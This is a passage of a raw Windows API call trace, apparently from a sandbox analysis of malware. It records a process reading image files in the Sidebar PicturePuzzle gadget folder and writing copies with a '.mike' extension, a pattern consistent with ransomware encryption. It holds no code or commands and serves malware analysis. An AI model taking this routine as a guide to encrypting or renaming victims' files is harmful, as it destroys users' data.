(normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png"), fInfoLevelId=0x0, lpFileInformation=0x218f464 | out: lpFileInformation=0x218f464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba18d99f, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba18d99f, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0bdc79c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xb43)) returned 1 [0133.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0133.371] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.371] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0133.371] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.371] GetFileType (hFile=0x284) returned 0x1 [0133.371] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0133.372] GetFileType (hFile=0x284) returned 0x1 [0133.373] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.373] GetFileType (hFile=0x284) returned 0x1 [0133.373] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.373] GetFileType (hFile=0x284) returned 0x1 [0133.373] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0133.374] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0133.374] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.374] GetFileType (hFile=0x284) returned 0x1 [0133.374] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0133.374] GetFileType (hFile=0x284) returned 0x1 [0133.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.376] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ca2420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18ca2420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18ca2420, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd70)) returned 1 [0133.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.376] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.376] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x219c98c | out: lpFileInformation=0x219c98c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ca2420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18ca2420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18ca2420, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd70)) returned 1 [0133.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.376] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.376] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", dwFileAttributes=0x80) returned 0 [0133.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0133.376] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\tile_drop_shadow.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ca2420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18ca2420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18ca2420, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xd70)) returned 1 [0133.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0133.377] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\tile_drop_shadow.png", lpFilePart=0x0) returned 0x5f [0133.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0133.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0133.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0133.378] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0133.378] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.378] GetFileType (hFile=0x284) returned 0x1 [0133.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0133.378] GetFileType (hFile=0x284) returned 0x1 [0133.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0133.379] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0133.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.379] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png"), fInfoLevelId=0x0, lpFileInformation=0x219f3f8 | out: lpFileInformation=0x219f3f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba225f1b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba225f1b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c028fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd3c)) returned 1 [0133.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.379] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.379] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.379] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png"), fInfoLevelId=0x0, lpFileInformation=0x219f760 | out: lpFileInformation=0x219f760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba225f1b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba225f1b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c028fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd3c)) returned 1 [0133.379] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.379] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.380] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.380] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.380] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.380] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0133.380] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0133.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0133.381] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike", lpFilePart=0x0) returned 0x5e [0133.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.381] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.381] GetFileType (hFile=0x284) returned 0x1 [0133.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.381] GetFileType (hFile=0x284) returned 0x1 [0133.381] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0133.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0133.382] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png"), fInfoLevelId=0x0, lpFileInformation=0x21a0278 | out: lpFileInformation=0x21a0278*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba225f1b, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba225f1b, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c028fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd3c)) returned 1 [0133.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0133.382] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0133.383] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.383] GetFileType (hFile=0x284) returned 0x1 [0133.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0133.383] GetFileType (hFile=0x284) returned 0x1 [0133.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0133.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.385] GetFileType (hFile=0x284) returned 0x1 [0133.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0133.385] GetFileType (hFile=0x284) returned 0x1 [0133.385] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0133.385] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0133.385] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.385] GetFileType (hFile=0x284) returned 0x1 [0133.385] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0133.385] GetFileType (hFile=0x284) returned 0x1 [0133.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0133.387] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ca2420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18ca2420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18cc8580, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf60)) returned 1 [0133.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0133.387] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.387] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.387] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x21ae264 | out: lpFileInformation=0x21ae264*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ca2420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18ca2420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18cc8580, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf60)) returned 1 [0133.387] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.387] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.387] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", dwFileAttributes=0x80) returned 0 [0133.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0133.388] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_down.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18ca2420, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x18ca2420, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x18cc8580, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0xf60)) returned 1 [0133.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0133.388] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_down.png", lpFilePart=0x0) returned 0x59 [0133.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0133.389] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0133.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0133.389] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0133.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0133.390] GetFileType (hFile=0x284) returned 0x1 [0133.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0133.390] GetFileType (hFile=0x284) returned 0x1 [0133.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0133.390] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0133.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0133.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.390] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png"), fInfoLevelId=0x0, lpFileInformation=0x21b0c4c | out: lpFileInformation=0x21b0c4c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1d9c5d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba1d9c5d, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xc0c028fc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xd37)) returned 1 [0133.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0133.390] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png", lpFilePart=0x0) returned 0x59 [0133.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0133.391] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\timer_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\picturepuzzle.gadget\\images\\timer_over.png"), fInfoLevelId=0x0, lpFileInformation=0x21b0fb4 | out: lpFileInformation=0x21b0fb4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba1d9c5d, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xba1d9c5d, ftLastAccessTime.dwHighDateTime=0x1ca0404, 